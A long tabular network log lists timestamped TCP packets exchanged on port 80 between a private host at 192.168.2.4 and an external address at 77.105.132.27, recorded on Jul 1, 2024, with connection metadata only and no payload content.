Jul 1, 2024 09:16:13.879431009 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879441977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879452944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879458904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.879463911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879477024 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879488945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879492044 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.879501104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879508972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.879512072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879523039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879528046 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.879535913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.879554033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.879580021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919467926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919493914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919511080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919528961 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919572115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919584036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919600010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919621944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919646978 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919673920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919687986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919707060 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919724941 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.919815063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.919852972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965465069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965529919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965538979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965553999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965567112 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965569973 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965584993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965590000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965600014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965607882 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965624094 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965640068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965795040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965810061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965827942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965847969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965852976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965862036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965877056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965878963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965892076 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.965895891 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965910912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.965928078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.966377974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966392994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966407061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966419935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966429949 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.966469049 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.966532946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966547012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966562033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966576099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966582060 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.966592073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966609955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.966635942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.966980934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.966995955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967010975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967019081 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967025995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967039108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967042923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967053890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967056990 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967070103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967082977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967092037 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967111111 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967549086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967590094 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967710972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967726946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967749119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967765093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967767000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967780113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967796087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967809916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967816114 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967823982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.967854023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.967874050 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968185902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968203068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968216896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968230963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968238115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968251944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968252897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968266964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968276024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968281984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968296051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968300104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968333960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968769073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968785048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968799114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968812943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968820095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968827009 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968842030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968849897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968854904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968868971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968877077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968883991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968894958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968899012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.968924046 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.968971968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969465971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969480991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969495058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969510078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969522953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969525099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969532013 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969540119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969553947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969568968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969574928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969583035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969598055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969598055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969613075 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.969614983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969631910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.969656944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970256090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970272064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970284939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970299006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970308065 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970313072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970328093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970330000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970360041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970781088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970798969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970813990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970824003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970829010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970838070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970844984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970859051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970874071 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970879078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970879078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970887899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970889091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970904112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970909119 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970918894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970932961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.970935106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970952988 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.970978975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971687078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971703053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971716881 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971730947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971735001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971745968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971760035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971764088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971775055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971788883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971800089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971807957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971823931 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971824884 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971838951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971848011 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971853971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.971874952 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.971904993 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.972659111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972676039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972691059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972706079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972721100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972722054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.972734928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972749949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972763062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972769976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.972779036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972781897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.972794056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972800016 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.972807884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972821951 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972836018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972851992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.972867966 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.972893000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.014174938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014209986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014225960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014240026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014254093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014260054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.014270067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014286995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.014326096 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.014343023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.014388084 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060291052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060314894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060331106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060363054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060370922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060385942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060388088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060400963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060415983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060434103 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060451031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060655117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060669899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060683966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060698986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060700893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060714006 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060728073 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060730934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.060750008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.060769081 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061069965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061084986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061103106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061117887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061131954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061135054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061146975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061161995 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061181068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061508894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061523914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061537981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061553001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061562061 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061567068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061582088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061589956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061598063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061614037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061616898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061630011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.061646938 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.061677933 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.062105894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062151909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062161922 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.062166929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062186956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.062206984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.062319994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062335014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062350988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062366009 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062372923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.062416077 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.062922001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062962055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062975883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.062979937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063004971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063020945 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063149929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.063167095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.063180923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.063188076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063198090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.063206911 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063221931 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063245058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.063977957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.063992977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064007998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064022064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064024925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064037085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064047098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064050913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064064980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064080954 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064085007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064095020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064104080 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064107895 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064122915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064133883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064137936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064152956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064167023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064167976 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064181089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064183950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064196110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064203978 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064209938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064227104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064227104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064254045 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064287901 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064491034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064512014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064536095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064549923 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064552069 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064567089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064574003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064580917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064596891 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.064603090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064635038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.064994097 CEST	80	49752	77.105.132.27	192.168.2.4
